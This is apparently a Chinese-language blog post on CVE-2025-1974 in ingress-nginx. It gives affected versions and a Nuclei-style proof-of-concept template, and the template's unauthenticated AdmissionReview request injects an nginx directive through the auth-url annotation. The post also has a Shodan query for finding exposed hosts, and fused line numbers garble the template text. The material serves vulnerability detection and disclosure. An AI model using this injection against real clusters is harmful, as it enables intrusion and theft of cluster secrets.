-ttpx.png)
CVE-2025-1974 Kubernetes RCE漏洞
Kubernetes 中发现了一个安全问题。在某些情况下,未经身份验证且能够访问 Pod 网络的攻击者可以在 ingress-nginx 控制器上下文中执行任意代码。这可能导致控制器可访问的 Secret 信息泄露。(请注意,在默认安装中,控制器可以访问集群范围内的所有 Secret。)
此问题会影响 ingress-nginx。如果您的集群中未安装 ingress-nginx,则不会受到影响。您可以通过运行“kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx”来检查。
受影响的版本
< v1.11.0
v1.11.0 - 1.11.4
v1.12.0
POC
id: CVE-2025-197423info:4 name: Ingress-Nginx Controller - Remote Code Execution5 author: iamnoooob,rootxharsh,pdresearch6 severity: critical7 description: |8 A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller9 impact: |10 Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.11 remediation: |12 Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later13 reference:14 - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities15 - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx16 - https://nvd.nist.gov/vuln/detail/CVE-2025-197417 classification:18 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H19 cvss-score: 9.820 cwe-id: CWE-65321 cve-id: CVE-2025-197422 metadata:23 verified: true24 max-request: 125 shodan-query: ssl:"ingress-nginx" port:844326 tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s2728http:29 - raw:30 - |31 POST / HTTP/1.132 Host: {{Hostname}}33 Content-Type: application/json3435 {36 "kind": "AdmissionReview",37 "apiVersion": "admission.k8s.io/v1",38 "request": {39 "uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",40 "kind": {41 "group": "networking.k8s.io",42 "version": "v1",43 "kind": "Ingress"44 },45 "resource": {46 "group": "networking.k8s.io",47 "version": "v1",48 "resource": "ingresses"49 },50 "requestKind": {51 "group": "networking.k8s.io",52 "version": "v1",53 "kind": "Ingress"54 },55 "requestResource": {56 "group": "networking.k8s.io",57 "version": "v1",58 "resource": "ingresses"59 },60 "name": "test-{{randstr}}",61 "namespace": "default",62 "operation": "CREATE",63 "userInfo": {6465 },66 "object": {67 "kind": "Ingress",68 "apiVersion": "networking.k8s.io/v1",69 "metadata": {70 "name": "test-{{randstr}}",71 "namespace": "default",72 "creationTimestamp": null,73 "annotations": {74 "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"75 }76 },77 "spec": {78 "ingressClassName": "nginx",79 "rules": [80 {81 "host": "{{randstr}}",82 "http": {83 "paths": [84 ]85 }86 }87 ]88 },89 "status": {90 "loadBalancer": {}91 }92 },93 "oldObject": null,94 "dryRun": true,95 "options": {96 "kind": "CreateOptions",97 "apiVersion": "meta.k8s.io/v1"98 }99 }100 }101102 matchers:103 - type: word104 part: body105 words:106 - 'AdmissionReview'107 - 'directive is not allowed here'108 - 'load_module'109 condition: and免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
